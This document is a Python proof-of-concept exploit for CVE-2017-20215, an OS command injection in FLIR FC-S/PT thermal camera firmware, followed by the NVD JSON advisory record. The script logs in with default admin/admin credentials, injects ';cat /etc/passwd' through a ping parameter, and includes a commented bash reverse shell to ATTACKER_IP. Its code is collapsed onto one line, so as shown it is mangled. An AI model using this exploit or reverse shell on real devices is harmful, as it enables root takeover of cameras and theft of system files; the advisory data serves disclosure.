CVE-2017-20215

import requests import sys # CVE-2017-20215 PoC - FLIR Thermal Camera OS Command Injection # Authenticated OS Command Injection on FLIR FC-S/PT firmware 8.0.0.64 target = sys.argv[1] if len(sys.argv) > 1 else 'http://target-camera.local' username = 'admin' password = 'admin' # Login to obtain session login_url = f'{target}/login' session = requests.Session() # Authentication request login_data = { 'username': username, 'password': password } try: response = session.post(login_url, data=login_data, timeout=10) print(f'[*] Login attempt completed. Status: {response.status_code}') # Command injection through vulnerable parameter # Inject command to create reverse shell or execute arbitrary command cmd_injection_url = f'{target}/cgi-bin/admin.cgi' # Example: Inject command to read /etc/passwd payload = { 'action': 'ping', 'host': '127.0.0.1;cat /etc/passwd' } exploit_response = session.get(cmd_injection_url, params=payload, timeout=10) print(f'[*] Exploit sent. Response length: {len(exploit_response.text)}') print(f'[*] Response preview: {exploit_response.text[:500]}') # Alternative: Reverse shell payload example # host='127.0.0.1;bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1' except requests.exceptions.RequestException as e: print(f'[!] Request failed: {e}') print('[*] Note: Target may be offline or not vulnerable')

{"cve": {"id": "CVE-2017-20215", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:15:56.680", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FLIR Thermal Camera FC-S/PT firmware version 8.0.0.64 contains an authenticated OS command injection vulnerability that allows attackers to execute shell commands with root privileges. Authenticated attackers can inject arbitrary shell commands through unvalidated input parameters to gain complete control of the thermal camera system."}, {"lang": "es", "value": "El firmware de la cámara térmica FLIR FC-S/PT versión 8.0.0.64 contiene una vulnerabilidad de inyección de comandos del sistema operativo autenticada que permite a los atacantes ejecutar comandos de shell con privilegios de root. Los atacantes autenticados pueden inyectar comandos de shell arbitrarios a través de parámetros de entrada no validados para obtener control total del sistema de la cámara térmica."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2017090207", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/144325", "source": "[email protected]"}, {"url": "https://web.archive.org/web/20171011125811/https://www.flir.com/security/blog/details/?ID=87043", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/42788/", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5437.php", "source": "[email protected]"}, {"url": "https://cxsecurity.com/issue/WLB-2017090207", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.exploit-db.com/exploits/42788/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5437.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}